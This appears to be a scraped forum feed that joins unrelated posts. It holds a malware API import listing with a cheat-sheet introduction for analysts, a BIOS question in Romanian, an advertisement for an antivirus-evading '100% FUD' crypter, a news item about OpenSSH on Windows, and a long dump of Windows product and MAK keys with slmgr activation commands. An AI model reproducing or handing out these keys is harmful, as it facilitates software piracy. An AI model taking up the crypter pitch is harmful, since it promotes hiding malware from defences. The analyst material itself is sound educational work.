ExitProcess 0x409100 kernel32.dll WriteFile 0x409104 kernel32.dll UnhandledExceptionFilter 0x409108 kernel32.dll RtlUnwind 0x40910c kernel32.dll RaiseException 0x409110 kernel32.dll GetStdHandle 0x409114 user32.dll GetKeyboardType 0x40911c user32.dll MessageBoxA 0x409120 advapi32.dll RegQueryValueExA 0x409128 advapi32.dll RegOpenKeyExA 0x40912c advapi32.dll RegCloseKey 0x409130 kernel32.dll TlsSetValue 0x409138 kernel32.dll TlsGetValue 0x40913c kernel32.dll TlsFree 0x409140 kernel32.dll TlsAlloc 0x409144 kernel32.dll LocalFree 0x409148 kernel32.dll LocalAlloc 0x40914c wsock32.dll closesocket 0x409154 wsock32.dll WSACleanup 0x409158 wsock32.dll recv 0x40915c wsock32.dll send 0x409160 wsock32.dll connect 0x409164 wsock32.dll htons 0x409168 wsock32.dll socket 0x40916c wsock32.dll WSAStartup 0x409170 wsock32.dll gethostbyname 0x409174 advapi32.dll RegSetValueExA 0x40917c advapi32.dll RegCreateKeyA 0x409180 advapi32.dll RegCloseKey 0x409184 advapi32.dll AdjustTokenPrivileges 0x409188 advapi32.dll LookupPrivilegeValueA 0x40918c advapi32.dll OpenProcessToken 0x409190 user32.dll GetForegroundWindow 0x409198 user32.dll wvsprintfA 0x40919c kernel32.dll CloseHandle 0x4091a4 kernel32.dll RtlMoveMemory 0x4091a8 kernel32.dll RtlZeroMemory 0x4091ac kernel32.dll WriteProcessMemory 0x4091b0 kernel32.dll ReadProcessMemory 0x4091b4 kernel32.dll VirtualProtect 0x4091b8 kernel32.dll Sleep 0x4091bc kernel32.dll GetTickCount 0x4091c0 kernel32.dll MoveFileExA 0x4091c4 kernel32.dll ReadFile 0x4091c8 kernel32.dll WriteFile 0x4091cc kernel32.dll SetFilePointer 0x4091d0 kernel32.dll FindClose 0x4091d4 kernel32.dll FindFirstFileA 0x4091d8 kernel32.dll DeleteFileA 0x4091dc kernel32.dll CreateFileA 0x4091e0 kernel32.dll GetPrivateProfileIntA 0x4091e4 kernel32.dll GetPrivateProfileStringA 0x4091e8 kernel32.dll WritePrivateProfileStringA 0x4091ec kernel32.dll SetFileAttributesA 0x4091f0 kernel32.dll GetCurrentProcessId 0x4091f4 kernel32.dll GetCurrentProcess 0x4091f8 kernel32.dll Process32Next 0x4091fc kernel32.dll Process32First 0x409200 kernel32.dll Module32Next 0x409204 kernel32.dll Module32First 0x409208 kernel32.dll CreateToolhelp32Snapshot 0x40920c kernel32.dll WinExec 0x409210 kernel32.dll lstrcpyA 0x409214 kernel32.dll lstrcatA 0x409218 kernel32.dll lstrcmpiA 0x40921c kernel32.dll lstrcmpA 0x409220 kernel32.dll lstrlenA 0x409224 kernel32.dll lstrlenA 0x40922c kernel32.dll lstrcpyA 0x409230 kernel32.dll lstrcmpiA 0x409234 kernel32.dll lstrcmpA 0x409238 kernel32.dll lstrcatA 0x40923c kernel32.dll WriteProcessMemory 0x409240 kernel32.dll VirtualProtect 0x409244 kernel32.dll TerminateThread 0x409248 kernel32.dll TerminateProcess 0x40924c kernel32.dll Sleep 0x409250 kernel32.dll OpenProcess 0x409254 kernel32.dll GetWindowsDirectoryA 0x409258 kernel32.dll GetTickCount 0x40925c kernel32.dll GetSystemDirectoryA 0x409260 kernel32.dll GetModuleHandleA 0x409264 kernel32.dll GetCurrentProcessId 0x409268 kernel32.dll GetCurrentProcess 0x40926c kernel32.dll GetComputerNameA 0x409270 kernel32.dll ExitProcess 0x409274 kernel32.dll CreateThread 0x409278 user32.dll wvsprintfA 0x409280 user32.dll UnhookWindowsHookEx 0x409284 user32.dll SetWindowsHookExA 0x409288 user32.dll GetWindowThreadProcessId 0x40928c user32.dll GetWindowTextA 0x409290 user32.dll GetForegroundWindow 0x409294 user32.dll GetClassNameA 0x409298 user32.dll CallNextHookEx 0x40929c Looking over these imported API functions may at first seem useless to the untrained analyst. However, if you begin to dissect what some of the APIs can be used for you can begin to make assumptions about the function of this malware. For example GetTickCount is a very common API for detecting debuggers. AdjustTokenPrivileges and LookupPrivilegeValueA are both commonly used in accessing the Windows security tokens. RegSetValueExA, RegCreateKeyA, and RegCloseKey are used when accessing and altering a registry key. Taking just these APIs into consideration you could begin to make some interesting hypothesis about the capabilities of this specific sample. I’ve noticed that analysts who don’t totally understand these API function will typically ignore them. For that fact I’m creating a “cheat sheet” for the Windows API functions. The “pre-final” release is attached below. Please don’t forget that Microsoft did not build these APIs for malicious use and are very commonly used by Windows programmers (unless it’s an undocumented API). Thus analyzing just the imported APIs may not tell you if a sample is malicious or not (but is very useful if you already know a sample is malicious). Over the past month I’ve also been working on analyzing what is now over 5TB of malware to gather the most frequently used Windows APIs. This data will likely continue to process for close to another month. Once this is done I’ll work on completing this cheat sheet based on those findings and write another post about my discoveries. Keeping that in mind this list is not final and if you have any feedback, comments, questions, or recommendations please make them! In the course of developing the current list I used multiple resources, I’d just like to highlight a few. These are also great resources if you’re looking to learn more. Resources: Practical Malware Analysis – great book on reverse engineering malware MSDN – where to go if you’re curious about a specific Windows API Windows PE File Details – Great article that describes the fundamentals of the PE file and more details surrounding PE file imports Cheat Sheet Version .5 : Download Source : https://www.bnxnet.com/windows-api-for-hackers/
-
- apis
- kernel32.dll
-
(and 3 more)
Tagged with:
-
Salut,un prieten si-a achizitionat un notebook pentru facultate de la un magazin Carrefour,toate bune si frumoase a ajuns cu el acasa si m-a chemat sa-i pun windows 7 pe el (mentionez ca pe notebook avea un soft de prezentare ceva in care arata capacitatile lui etc ). Am bootat pe un stick usb windows 7 am ajuns la el am dat F2 cand sa intru in bios imi cere parola,a sunat omul la magazin si aia i-au dat parola,intru in bios selectez sa se booteze de pe stick windowsul dau F10 salvez,isi da restart dar pur si simplu nu a incercat sa ia windowsul. Am vazut prin bios ca e limitat,are parole peste tot si nustiu ce sa-i fac, oare nu accepta windows 7 si ii trebuie neaparat windows 8 sau ? O sa va las mai jos doua imagini una in care se vede bios-ul si una cu modelul exact al notebook-ului . View image: DSC 0041 View image: DSC 0040 Astept ceva recomandari,multumesc frumos,o zi buna!
-
Crypter?RST by dang3r1988[100% FUD - 0/35 AVS] Create Vb CRYPTER FUNCTIONAL S.O XP sp1 OK XP sp2 OK XP sp3 OK Vista x86 OK Vista x64 OK Windows 7 X86 OK Windows 7 x64 OK Windows 8 X86 OK Windows 8 x64 OK Windows 10 X86 OK Windows 10 x64 OK Scan:::... Am zis ca nu va mai prezint nimic din ceea ce stiu eu!! dar avand in vedere comentarile voastre si o sa va mai arat ca ,eu am cunostinte in IT si nu vorbesc baliverne ca voi, care inca va mai uitati la desene animate si stiti doar sa stati pe facebook si sa comentati inutil in nestinta de cauza ,,UNI,,Si nu o sa va dau link de download sa va bateti voi joc de nunca mea si nici nu cred ca va trebuie crypter meu??? ca voi stiti sa va faceti singuri dupa cum comentati:))1+1=5:))
-
Until now Unix and Linux system administrators have to download a third-party SSH client software like Putty on their Windows machines to securely manage their machines and servers remotely through Secure Shell protocol or Shell Session (better known as SSH). This might have always been an awkward feature of Windows platform, as it lacks both – a native SSH client software for connecting to Linux machines, and an SSH server to support inbound connections from Linux machines. But… Believe it or not: You don't need to deal with any third-party SSH client now, as Microsoft is working on supporting OpenSSH. Yes, Microsoft has finally decided to bring OpenSSH client and server to Windows. The PowerShell team at Microsoft has announced that the company is going to support and contribute to OpenSSH community in an effort to deliver better SSH support in the PowerShell and Windows SSH software solutions. So, the upcoming version of Windows PowerShell – the command-line shell and scripting language – will allow users to manage Windows and Linux computers through SSH. For those who are unaware, SSH is basically designed to offer the best security when accessing another computer remotely. It not only encrypts the remote session, but also provides better authentication facilities, with features like secure file transferring and network port forwarding. This is not first time Microsoft has planned to adopt SSH for its Windows platform, the company had tried to allow the secure shell protocol to be used within Windows twice but was unable to implement it. However, developers who are eager to use this new functionality in PowerShell still have to wait for some time, as the project is still in the early planning phase. So far, there isn’t any definite release date. The PowerShell team will update more information on when users can expect SSH support shortly. Source
-
- linux
- powershell
-
(and 3 more)
Tagged with:
-
Windows 8.1 Windows 8.1 Professional GCRJD-8NW9H-F2CDX-CCM8D-9D6T9 Windows 8.1 Professional N HMCNV-VVBFX-7HMBH-CTY9B-B4FXY Windows 8.1 Enterprise MHF9N-XY6XB-WVXMC-BTDCT-MKKG7 Windows 8.1 Enterprise N TT4HM-HN7YT-62K67-RGRQJ-JFFXW Windows 8 Windows 8 Professional NG4HW-VH26C-733KW-K6F98-J8CK4 Windows 8 Professional N XCVCF-2NXM9-723PB-MHCB7-2RYQQ Windows 8 Enterprise 32JNW-9KQ84-P47T8-D8GGY-CWCK7 Windows 8 Enterprise N JMNMF-RHW7P-DMY6X-RF3DR-X2BQT Windows 7 Windows 7 Professional FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4 Windows 7 Professional N MRPKT-YTG23-K7D7T-X2JMM-QY7MG Windows 7 Enterprise 33PXH-7Y6KF-2VJC9-XBBR8-HVTHH Windows 7 Enterprise N YDRBP-3D83W-TY26F-D46B2-XCKRJ Windows 7 Enterprise E C29WB-22CC8-VJ326-GHFJW-H9DH4 Windows Server 2012 R2 Windows Server 2012 R2 Server Standard D2N9P-3P6X9-2R39C-7RTCD-MDVJX Windows Server 2012 R2 Datacenter W3GGN-FT8W3-Y4M27-J84CP-Q3VJ9 Windows Server 2012 R2 Essentials KNC87-3J2TX-XB4WP-VCPJV-M4FWM Windows Server 2012 Windows Server 2012 Core BN3D2-R7TKB-3YPBD-8DRP2-27GG4 Windows Server 2012 Core N 8N2M2-HWPGY-7PGT9-HGDD8-GVGGY Windows Server 2012 Core Single Language 2WN2H-YGCQR-KFX6K-CD6TF-84YXQ Windows Server 2012 Core Country Specific 4K36P-JN4VD-GDC6V-KDT89-DYFKP Windows Server 2012 Server Standard XC9B7-NBPP2-83J2H-RHMBY-92BT4 Windows Server 2012 Standard Core XC9B7-NBPP2-83J2H-RHMBY-92BT4 Windows Server 2012 Multipoint Standard HM7DN-YVMH3-46JC3-XYTG7-CYQJJ Windows Server 2012 Multipoint Premium XNH6W-2V9GX-RGJ4K-Y8X6F-QGJ2G Windows Server 2012 Datacenter 48HP8-DN98B-MYWDG-T2DCC-8W83P Windows Server 2012 Datacenter Core 48HP8-DN98B-MYWDG-T2DCC-8W83P Windows Server 2008 R2 Windows Server 2008 R2 HPC Edition FKJQ8-TMCVP-FRMR7-4WR42-3JCD7 Windows Server 2008 R2 Datacenter 74YFP-3QFB3-KQT8W-PMXWJ-7M648 Windows Server 2008 R2 Enterprise 489J6-VHDMP-X63PK-3K798-CPX3Y Windows Server 2008 R2 for Itanium-Based Systems GT63C-RJFQ3-4GMB6-BRFB9-CB83V Windows Server 2008 R2 Standard YC6KT-GKW9T-YTKYR-T4X34-R7VHC Windows Web Server 2008 R2 6TPJF-RBVHG-WBW2R-86QPH-6RTM4 MVBCQ-B3VPW-CT369-VM9TB-YFGBP MM7DF-G8XWM-J2VRG-4M3C4-GR27X KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8 MVBCQ-B3VPW-CT369-VM9TB-YFGBP KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR RGQ3V-MCMTC-6HP8R-98CDK-VP3FM Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3 6JQ32-Y9CGY-3Y986-HDQKT-BPFPG P72QK-2Y3B8-YDHDV-29DQB-QKWWM 6F4BB-YCB3T-WK763-3P6YJ-BVH24 9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC C43GM-DWWV8-V6MGY-G834Y-Y8QH3 GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9 MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7 MVYTY-QP8R7-6G6WG-87MGT-CRH2P Windows Keys 7YWX9-W3C2V-D46GW-P722P-9CP4D MM7DF-G8XWM-J2VRG-4M3C4-GR27X KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8 MVBCQ-B3VPW-CT369-VM9TB-YFGBP KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR RGQ3V-MCMTC-6HP8R-98CDK-VP3FM Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3 6JQ32-Y9CGY-3Y986-HDQKT-BPFPG P72QK-2Y3B8-YDHDV-29DQB-QKWWM 6F4BB-YCB3T-WK763-3P6YJ-BVH24 9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC C43GM-DWWV8-V6MGY-G834Y-Y8QH3 GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9 MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7 MVYTY-QP8R7-6G6WG-87MGT-CRH2P GRY6B-TJ49J-X73JG-38H9K-VWJHY C8XXQ-PQDD6-6KGP6-J8XT6-XGB2X 8XRH7-RTC6B-BJ42C-C2Q8Y-BRXMG PTTCH-H7J6M-4XXWH-86RT3-66P6M DLMKZ-2ILHP-7IUG9-A2QVK-A2BYX BPVVG-7KVMM-HGRZ1-SQZ4L-USRHM FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 3YHKG-DVQ27-RYRBX-JMPVM-WG38T MVBCQ-B3VPW-CT369-VM9TB-YFGBP Windows 7 Ultimate Serial Keys windows 7 ulimate - lenovo - 22TKD-F8XX6-YG69F-9M66D-PMJBM windows 7 ulimate - dell - 342DG-6YJR8-X92GV-V7DCV-P4K27 windows 7 ulimate - acer - FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 Windows 7 Professional Serial Keys windows 7 professional - dell - 32KD2-K9CTF-M3DJT-4J3WC-733WD windows 7 professional - acer - YKHFT-KW986-GK4PY-FDWYH-7TP9F windows 7 professional - hp - 74T2M-DKDBC-788W3-H689G-6P6GT windows 7 professional - samsung - GMJQF-JC7VC-76HMH-M4RKY-V4HX6 Windows 7 Home Premium Serial Keys windows 7 Home Premium - samsung - CQBVJ-9J697-PWB9R-4K7W4-2BT4J windows 7 Home Premium - packard bell - VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7 windows 7 Home Premium - dell - 6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82 windows 7 Home Premium - asus - 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG Windows 7 Beta 64-bit Product Key 7XRCQ-RPY28-YY9P8-R6HD8-84GH3 JYDV8-H8VXG-74RPT-6BJPB-X42V4 482XP-6J9WR-4JXT3-VBPP6-FQF4M JYDV8-H8VXG-74RPT-6BJPB-X42V4 ~~~~~~~~~~~~~~~~~~~~~~~~~~ Windows 7 Beta 32-bit Product Key 6JKV2-QPB8H-RQ893-FW7TM-PBJ73 TQ32R-WFBDM-GFHD2-QGVMH-3P9GC GG4MQ-MGK72-HVXFW-KHCRF-KW6KY 4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH QXV7B-K78W2-QGPR6-9FWH9-KGMM7 Windows 7 Anytime Upgrade key: RHPQ2-RMFJH-74XYM-BH4JX-XM76F Windows 7 Activation key: 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG Windows 8.1 serial key : ultimate edition NTTX3-RV7VB-T7X7F-WQYYY-9Y92F Windows 8 OS key : Professional edition XKY4K-2NRWR-8F6P2-448RF-CRYQH Windows 8 product key : Release preview TK8TP-9JN6P-7X7WW-RFFTV-B7QPF Windows 8 product number : Consumer preview DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 OS key : Developer’s preview 6RH4V-HNTWC-JQKG8-RFR3R-36498 Windows 8 product key : Developer’s version Y8N3-H7MMW-C76VJ-YD3XV-MBDKV 6RH4V-HNTWC-JQKG8-RFR3R-36498 4Y8N3-H7MMW-C76VJ-YD3XV-MBDKV MBFBV-W3DP2-2MVKN-PJCQD-KKTF7 28VNV-HF42G-K2WM9-JXRJQ-2WBQW NF32V-Q9P3W-7DR7Y-JGWRW-JFCK8 Windows 8 serial key : English DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 software key : Chinese DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 serial number : German DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 unique serial number : French DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 product key : Japanese DNJXJ-7XBW8-2378T-X22TX-BKG7J Window 8 Serial Keys 100 % Working 2GVN8-TV3C2-K3YM7-MMRVM-BBFDH 967N4-R7KXM-CJKJB-BHGCW-CPKT7 84NRV-6CJR6-DBDXH-FYTBF-4X49V RRYGR-8JNBY-V2RJ9-TJP4P-749T7 ND8P2-BD2PB-DD8HM-2926R-CRYQH XWCHQ-CDMYC-9WN2C-BWWTV-YY2KV BDDNV-BQ27P-9P9JJ-BQJ96-KTJXV KNTGM-BGJCJ-BPH3X-XX8V4-K4PKV F8X33-CNV3F-RH7MY-C73YT-XP73H 967N4-R7KXM-CJKJB-BHGCW-CPKT7 HNRGD-JP8FC-6F6CY-2XHYY-RCWXV 84NRV-6CJR6-DBDXH-FYTBF-4X49V BDDNV-BQ27P-9P9JJ-BQJ96-KTJXV CDQND-9X68R-RRFYH-8G28W-82KT7 DWV49-3GN3Q-4XMT7-QR9FQ-KKT67 F2M4V-KFNB7-9VVTW-MVRBQ-BG667 F8X33-CNV3F-RH7MY-C73YT-XP73H GPTCC-XN297-PVGY7-J8FQY-JK49V HV3TW-MMNBG-X99YX-XV8TJ-2GV3H J6FW2-HQNPJ-HBB6H-K9VTY-2PKT7 KQWNF-XPMXP-HDK3M-GBV69-Y7RDH MMRNH-BMB4F-87JR9-D72RY-MY2KV N4WY8-DVW92-GM8WF-CG872-HH3G7 ND8P2-BD2PB-DD8HM-2926R-CRYQH RRYGR-8JNBY-V2RJ9-TJP4P-749T7 VHNT7-CPRFX-7FRVJ-T8GVM-8FDG7 84NRV-6CJR6-DBDXH-FYTBF-4X49V BDDNV-BQ27P-9P9JJ-BQJ96-KTJXV 967N4-R7KXM-CJKJB-BHGCW-CPKT7 KQWNF-XPMXP-HDK3M-GBV69-Y7RDH F2M4V-KFNB7-9VVTW-MVRBQ-BG667 CR8NP-K37C3-MPD6Q-MBDDY-8FDG7 39DQ2-N4FYQ-GCY6F-JX8QR-TVF9V VHNT7-CPRFX-7FRVJ-T8GVM-8FDG7 GPTCC-XN297-PVGY7-J8FQY-JK49V HV3TW-MMNBG-X99YX-XV8TJ-2GV3H CDQND-9X68R-RRFYH-8G28W-82KT7 7HBX7-N6WK2-PF9HY-QVD2M-JK49V D32KW-GNPBK-CV3TW-6TB2W-K2BQH NBWPK-K86W9-27TX3-BQ7RB-KD4DH 2NF99-CQRYR-G6PQ9-WYGJ7-8HRDH F7BDM-KTNRW-7CYQP-V98KC-W2KT7 4JKWV-MNJCY-8MW3Q-VJYGP-DC73H KQWNF-XPMXP-HDK3M-GBV69-Y7RDH MMRNH-BMB4F-87JR9-D72RY-MY2KV N4WY8-DVW92-GM8WF-CG872-HH3G7 ND8P2-BD2PB-DD8HM-2926R-CRYQH RRYGR-8JNBY-V2RJ9-TJP4P-749T7 FFX8D-N3WMV-GM6RF-9YRCJ-82KT7 2CMGK-NMW4P-B846H-YXR6P-27F9V D2GBF-NGBW4-QQRGG-W38YB-BBFDH NTVHT-YF2M4-J9FJG-BJD66-YG667 GBJJV-YNF4T-R6222-KDBXF-CRYQH 4NMMK-QJH7K-F38H2-FQJ24-2J8XV 84NRV-6CJR6-DBDXH-FYTBF-4X49V 3NHJ7-3WWQK-4RFTH-8FHJY-PRYQH 988NM-XKXT9-7YFWH-H2Q3Q-C34DH TGXN4-BPPYC-TJYMH-3WXFK-4JMQH N9C46-MKKKR-2TTT8-FJCJP-4RDG7 Q4NBQ-3DRJD-777XK-MJHDC-749T7 2VTNH-323J4-BWP98-TX9JR-FCWXV D7KN2-CBVPG-BC7YC-9JDVJ-YPWXV 2GVN8-TV3C2-K3YM7-MMRVM-BBFDH 4NMMK-QJH7K-F38H2-FQJ24-2J8XV 76NDP-PD4JT-6Q4JV-HCDKT-P7F9V 7HBX7-N6WK2-PF9HY-QVD2M-JK49V ================================================================================================================= Windows 8.1 PRO / ENT Phone Activation MAK Key ** Windows 8.1 PRO / ENT Mak Keys Activate Both PRO & ENTERPRISE Edition Compatible to Upgrade WMC Edition.! ** Product Key(s)---------------------------------Remaining Activation Counts slmgr.vbs -ipk 7FGTT-NXKP6-KCHBY-D3XP9-FRFX3 937 slmgr.vbs -ipk P86Q8-PNR2W-4F226-BPJ2Q-7T8K3 591 slmgr.vbs -ipk JGDNT-VKFPY-36K8K-H83V7-VT8K3 165 slmgr.vbs -ipk Q36YN-97WHT-GQ4BR-684QP-FX7QQ 95 slmgr.vbs -ipk 9R3DP-NJV9M-P2TYG-6C4KR-R3JK3 25 slmgr.vbs -ipk K8YXT-N2KDG-B39MT-THK2H-XD6VD slmgr.vbs -ipk GNCQM-TQJ9H-CD22V-DM4RX-9HHQQ slmgr.vbs -ipk NTJ92-QJFB3-YVBYK-7J9BC-GQ6VD slmgr.vbs -ipk 2N4YY-H4KRF-CXVM6-DB46Y-RCYDQ slmgr.vbs -ipk 4HFYM-N3CH8-8237K-7YDKD-8K7QQ slmgr.vbs -ipk 7TYYN-H7GKX-MMCXW-KWKDT-6F27D slmgr.vbs -ipk CWKY6-FGNX6-877Y7-DTGFM-RCYDQ slmgr.vbs -ipk MPNQW-FW9V2-89HT6-TKFXK-P36VD slmgr.vbs -ipk Q226H-HN692-BG7J8-G2PHY-88D3Q [Tested working on VM1 13 November 2014] ================================================================================= Windows 8/8.1 RTM Pro WMC Phone Activation RETAIL Keys: slmgr.vbs -ipk CYGD4-6JKKC-WNGPV-X8B9P-D668D slmgr.vbs -ipk F2H27-X7VJN-YMMKJ-GPW9D-YBFFQ slmgr.vbs -ipk C9VKD-M6HPN-Y4GP4-VXG4G-XP74Q ================================================================================= Windows 8.1 RTM Pro Phone Activation RETAIL Keys slmgr.vbs -ipk NGCYH-JF34J-GD93B-RYD9T-BPYCY slmgr.vbs -ipk JNXYY-KXCW2-TVFHV-BQ63F-DJXT7 slmgr.vbs -ipk NXGRM-3VPXH-76DVR-HT43H-MBFDH slmgr.vbs -ipk RJHTD-N7283-XKYHD-77Q2V-T273H slmgr.vbs -ipk JJQNJ-DXQH2-3Y74Y-V273B-K73G7 7YWX9-W3C2V-D46GW-P722P-9CP4D MM7DF-G8XWM-J2VRG-4M3C4-GR27X KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8 MVBCQ-B3VPW-CT369-VM9TB-YFGBP KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR RGQ3V-MCMTC-6HP8R-98CDK-VP3FM Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3 6JQ32-Y9CGY-3Y986-HDQKT-BPFPG P72QK-2Y3B8-YDHDV-29DQB-QKWWM 6F4BB-YCB3T-WK763-3P6YJ-BVH24 9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC C43GM-DWWV8-V6MGY-G834Y-Y8QH3 GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9 MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7 MVYTY-QP8R7-6G6WG-87MGT-CRH2P GRY6B-TJ49J-X73JG-38H9K-VWJHY C8XXQ-PQDD6-6KGP6-J8XT6-XGB2X 8XRH7-RTC6B-BJ42C-C2Q8Y-BRXMG PTTCH-H7J6M-4XXWH-86RT3-66P6M DLMKZ-2ILHP-7IUG9-A2QVK-A2BYX BPVVG-7KVMM-HGRZ1-SQZ4L-USRHM FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 3YHKG-DVQ27-RYRBX-JMPVM-WG38T MVBCQ-B3VPW-CT369-VM9TB-YFGBP Windows 7 Ultimate Serial Keys windows 7 ulimate - lenovo - 22TKD-F8XX6-YG69F-9M66D-PMJBM windows 7 ulimate - dell - 342DG-6YJR8-X92GV-V7DCV-P4K27 windows 7 ulimate - acer - FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 Windows 7 Professional Serial Keys windows 7 professional - dell - 32KD2-K9CTF-M3DJT-4J3WC-733WD windows 7 professional - acer - YKHFT-KW986-GK4PY-FDWYH-7TP9F windows 7 professional - hp - 74T2M-DKDBC-788W3-H689G-6P6GT windows 7 professional - samsung - GMJQF-JC7VC-76HMH-M4RKY-V4HX6 Windows 7 Home Premium Serial Keys windows 7 Home Premium - samsung - CQBVJ-9J697-PWB9R-4K7W4-2BT4J windows 7 Home Premium - packard bell - VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7 windows 7 Home Premium - dell - 6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82 windows 7 Home Premium - asus - 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG Windows 7 Beta 64-bit Product Key 7XRCQ-RPY28-YY9P8-R6HD8-84GH3 JYDV8-H8VXG-74RPT-6BJPB-X42V4 482XP-6J9WR-4JXT3-VBPP6-FQF4M JYDV8-H8VXG-74RPT-6BJPB-X42V4 ~~~~~~~~~~~~~~~~~~~~~~~~~~ Windows 7 Beta 32-bit Product Key 6JKV2-QPB8H-RQ893-FW7TM-PBJ73 TQ32R-WFBDM-GFHD2-QGVMH-3P9GC GG4MQ-MGK72-HVXFW-KHCRF-KW6KY 4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH Windows 7 Ultimate Retail Offline Activation Key HTXFV-FH8YX-VCY69-JJGBK-7R6XP 72VG4-V3KTK-7BQYH-7GXDW-48JJ3 GCHHP-39HXK-X3YWW-HPBWQ-RPGQV GMY2P-RBX7P-TQGX8-C8B9B-BGXFF J78FT-J48BQ-HH2M7-CYVTM-MXRHY 6QVYR-WQDGH-RPV2H-FH739-M462C 6MGBH-4QDD8-7V9G8-WJ4KR-9JPFK BPFDC-JQMCP-7CRPX-DCT9D-CXQB9 FBQFV-6VW7F-C8MXX-VTMV3-R7KKQ MQ9VV-GPKFB-4R88W-H3KBT-CXMYH TM7K4-MMRYX-6BMFT-38D72-K3J8W Windows 8 Professional NG4HW-VH26C-733KW-K6F98-J8CK4 XKY4K-2NRWR-8F6P2-448RF-CRYQH Windows 8 Professional N XCVCF-2NXM9-723PB-MHCB7-2RYQQ windows 7 keys are: H3RCX-HC6QD-DB492-YWGHP-3PB4C PVBHT-4796G-KM9Q3-7V8HD-J6V7M FGXGR-D4GTB-6YY24-HG67D-FPQJV PMMB7-VPWQM-R4TBJ-RQW4F-4J6JB H2CF9-HX9MM-KY3XQ-26W9C-BYYYX MKCRW-7BVW9-QT44X-QK7J3-RTJ79 6D72M-BGMX8-R8C6H-PFD72-Q3W6F VVCFH-4P4X2-KMFG2-PBPK3-G9X93 W3DDG-QM7B8-4J499-J8Q22-R3QW6 Q7WQW-QJBW8-C72H6-M8TX9-P4TB6 W2RQF-RRR9B-3BF7T-K2WYB-M7M8Q XJBCD-6QCVR-RFBWX-939GC-KHC9J 4DMCV-P3RYB-YRTVW-RW4Q6-BVM9P 2VY3F-F8WVR-7D3VV-YYF37-QVQKV Enjoy!